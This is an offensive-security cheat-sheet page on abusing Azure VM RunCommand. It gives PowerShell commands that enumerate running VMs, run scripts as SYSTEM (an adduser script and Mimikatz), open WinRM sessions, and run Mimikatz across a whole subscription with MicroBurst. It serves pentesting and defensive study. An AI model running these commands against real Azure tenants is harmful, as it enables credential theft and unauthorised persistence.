azure-services-virtual-machine.md (2394B)
1 --- 2 title: "Azure Services - Virtual Machine" 3 section: "Cloud" 4 sectionSlug: "cloud" 5 sourcePath: "docs/cloud/azure/azure-services-virtual-machine.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/cloud/azure/azure-services-virtual-machine.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Azure Services - Virtual Machine 12 13 ## RunCommand 14 15 > Allow anyone with "Contributor" rights to run PowerShell scripts on any Azure VM in a subscription as `NT Authority\System` 16 17 **Requirements**: `Microsoft.Compute/virtualMachines/runCommand/action` 18 19 * List available Virtual Machines 20 21 ```powershell 22 PS C:\> Get-AzureRmVM -status | where {$_.PowerState -EQ "VM running"} | select ResourceGroupName,Name 23 ResourceGroupName Name 24 ----------------- ---- 25 TESTRESOURCES Remote-Test 26 ``` 27 28 * Get Public IP of VM by querying the network interface 29 30 ```powershell 31 PS AzureAD> Get-AzVM -Name <RESOURCE> -ResourceGroupName <RG-NAME> | select -ExpandProperty NetworkProfile 32 PS AzureAD> Get-AzNetworkInterface -Name <RESOURCE368> 33 PS AzureAD> Get-AzPublicIpAddress -Name <RESOURCEIP> 34 ``` 35 36 * Execute Powershell script on the VM, like `adduser` 37 38 ```ps1 39 PS AzureAD> Invoke-AzVMRunCommand -VMName <RESOURCE> -ResourceGroupName <RG-NAME> -CommandId 'RunPowerShellScript' -ScriptPath 'C:\Tools\adduser.ps1' -Verbose 40 PS Azure C:\> Invoke-AzureRmVMRunCommand -ResourceGroupName TESTRESOURCES -VMName Remote-Test -CommandId RunPowerShellScript -ScriptPath Mimikatz.ps1 41 ``` 42 43 * Finally you should be able to connect via WinRM 44 45 ```ps1 46 $password = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force 47 $creds = New-Object System.Management.Automation.PSCredential('username', $Password) 48 $sess = New-PSSession -ComputerName <IP> -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer) 49 Enter-PSSession $sess 50 ``` 51 52 Against the whole subscription using `MicroBurst.ps1` 53 54 ```powershell 55 Import-module MicroBurst.psm1 56 Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt 57 ``` 58 59 ## References 60 61 * [Running Powershell scripts on Azure VM - Karl Fosaaen - November 6, 2018](https://blog.netspi.com/running-powershell-scripts-on-azure-vms/) 62 * [Training - Attacking and Defending Azure Lab - Altered Security](https://www.alteredsecurity.com/azureadlab)